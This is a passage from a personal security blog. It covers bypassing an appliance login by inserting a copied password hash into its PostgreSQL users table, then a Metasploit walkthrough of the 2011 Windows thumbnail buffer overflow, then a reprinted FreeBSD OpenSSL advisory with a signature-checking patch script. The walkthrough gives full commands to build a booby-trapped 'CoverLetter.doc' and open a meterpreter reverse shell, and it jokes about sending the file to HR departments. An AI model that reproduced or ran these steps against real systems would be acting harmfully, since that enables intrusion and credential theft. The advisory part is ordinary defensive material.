Schema |        Name        | Type  | Owner
-------+--------------------+-------+----------
public | schema_info        | table | App_User
public | users              | table | App_User

Query table users:
select * from users;

Fields of interest to me were (id, login, email, password, salt_val,passwd_create,passwd_updated)

Now before I went any further I made sure to dump the DB using pg_dump and pg_dumpall:
postgres@host:~$ pg_dump dbname > /tmp/dbname.out
postgres@host:~$ pg_dumpall > /tmp/db.out

At this point I had a few options:

  • Try to reverse the password encryption and salting mechanism
  • Try to find the code that handles the authentication and bypass that
  • Get access to another box, create a password and copy that hash and encrypted value over to the DB on the other system.

Luckily for me I had access to another device, so I created a password there, queried that DB and copied the encrypted password and hash into notepad, then used an insert statement to add the values to the DB along with a test user.

Connected back to the DB:
postgres=# \c App_Name

Insert new records:
INSERT INTO users (id,login,email,password,salt_val,created_at) values ('2','demo','demo@localhost','9abdgagf42324243240fdbd','8d5d6cd8fa6a0323jb3240988324','2006-12-05 21:15:32');

Went back to the login portal https://ipaddress and bingo! Big shout out to byte_bucket over at irc.freenode.net #pauldotcom, he was very helpful in helping me work through this.

Additional reading:

http://www.cyberciti.biz/faq/what-process-has-open-linux-port/

http://linux.die.net/man/8/pound

http://linux.die.net/man/1/pg_dump

https://support.eapps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=180

http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

Jan 05 2011

New Year, New MS Zero Day

The new year usually brings hope for new changes; however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Today's blog posting is based on the new Vulnerability in Graphics Rendering Engine. The guys over at www.metasploit.com have created a working exploit module for this that I was testing, and it seems to be working as stated.

According to the note in the module, it exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious ones). See the Microsoft advisory for details.

Test Lab Setup:

  • I used VMware Workstation with two hosts (XP, and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
  • Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to set up our reverse handler to listen on port 4545 for any incoming connections once our victim views/opens our specially crafted file. We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to connect back home :) .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now, once the victim views the file in a thumbnail view or opens it, you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, set up a persistent Meterpreter backdoor as shown by Carlos, or start capturing Windows logons with Smartlocker; basically, the sky’s the limit. Have fun hacking something.

Reference links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Nov 30 2010

FreeBSD-SA-10:10.openssl “Time to patch”

I noticed an email this morning that mentioned an OpenSSL issue affecting the FreeBSD platform, and I wanted to mention it again in case anyone missed it when it came out yesterday.

I just patched my system according to the steps in the advisory and I will report back if I experience any issues after patching.

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

II. Problem Description

A race condition exists in the OpenSSL TLS server extension code
parsing when used in a multi-threaded application, which uses
OpenSSL’s internal caching mechanism. The race condition can lead to
a buffer overflow. [CVE-2010-3864]

A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]

III. Impact

For affected server applications, an attacker may be able to utilize
the buffer overflow to crash the application or potentially run
arbitrary code with the privileges of the application. [CVE-2010-3864].

It may be possible to cause a DoS or potentially execute arbitrary code in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]

IV. Workaround

No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later.

It should also be noted that CVE-2010-3864 affects neither the Apache
HTTP server nor Stunnel.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc

[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install

NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>

3) To update your vulnerable system via a binary patch:

Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
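The source-patch route (steps 2a and 2b above) wrapped as a checked procedure, added here as an example rather than the advisory's own script: it only applies the patch after the detached PGP signature verifies, and refuses the libssl-only rebuild on an amd64 box that carries the i386 compatibility libraries (the NOTE above). It assumes gpg(1) with the FreeBSD Security Officer key already imported; the function names and work directory are this example's own choices.

```shell
#!/bin/sh
# Added example, not the advisory's own script: wraps the SA-10:10 source-patch
# steps so the patch is applied only after its detached PGP signature verifies,
# and flags the amd64 lib32 case that the libssl-only rebuild does not cover.
# Assumes FreeBSD fetch(1), patch(1) and gpg(1) with the Security Officer key
# imported; the work directory and function names are this example's choices.

PATCH_BASE="http://security.FreeBSD.org/patches/SA-10:10"
WORKDIR="${WORKDIR:-/var/tmp/sa1010}"

# Pick the patch file the advisory names for a release string as printed by
# uname -r (7.x -> openssl7.patch, 8.x -> openssl.patch); fails for others.
sa1010_patch_for() {
    case "$1" in
        7.*) echo "openssl7.patch" ;;
        8.*) echo "openssl.patch" ;;
        *)   return 1 ;;
    esac
}

# amd64 with the i386 compatibility libraries installed: the advisory says the
# lib32 copy is not rebuilt by the steps below, so the OS must be rebuilt instead.
sa1010_needs_world_rebuild() {            # $1 = machine arch, $2 = lib32 dir
    [ "$1" = "amd64" ] && [ -d "$2" ]
}

# Detached-signature check; gpg exits non-zero on a bad or missing signature.
sa1010_verify() {
    gpg --verify "$1.asc" "$1"
}

sa1010_apply() {
    rel=$(uname -r); arch=$(uname -m)
    name=$(sa1010_patch_for "$rel") || { echo "no SA-10:10 patch for $rel" >&2; return 1; }
    if sa1010_needs_world_rebuild "$arch" /usr/lib32; then
        echo "amd64 with lib32: rebuild the OS per the handbook instead" >&2; return 1
    fi
    mkdir -p "$WORKDIR" && cd "$WORKDIR" || return 1
    fetch "$PATCH_BASE/$name" "$PATCH_BASE/$name.asc" || return 1
    sa1010_verify "$name" || { echo "signature check FAILED; not applying" >&2; return 1; }
    cd /usr/src && patch < "$WORKDIR/$name" || return 1
    cd /usr/src/secure/lib/libssl && make obj && make depend && make && make install
}

# Nothing is fetched or patched unless explicitly asked for.
if [ "${1:-}" = "--apply" ]; then sa1010_apply; fi
```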

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Links:

http://www.freebsd.org/security/advisories.html

http://security.freebsd.org/advisories/FreeBSD-SA-10:10.openssl.asc
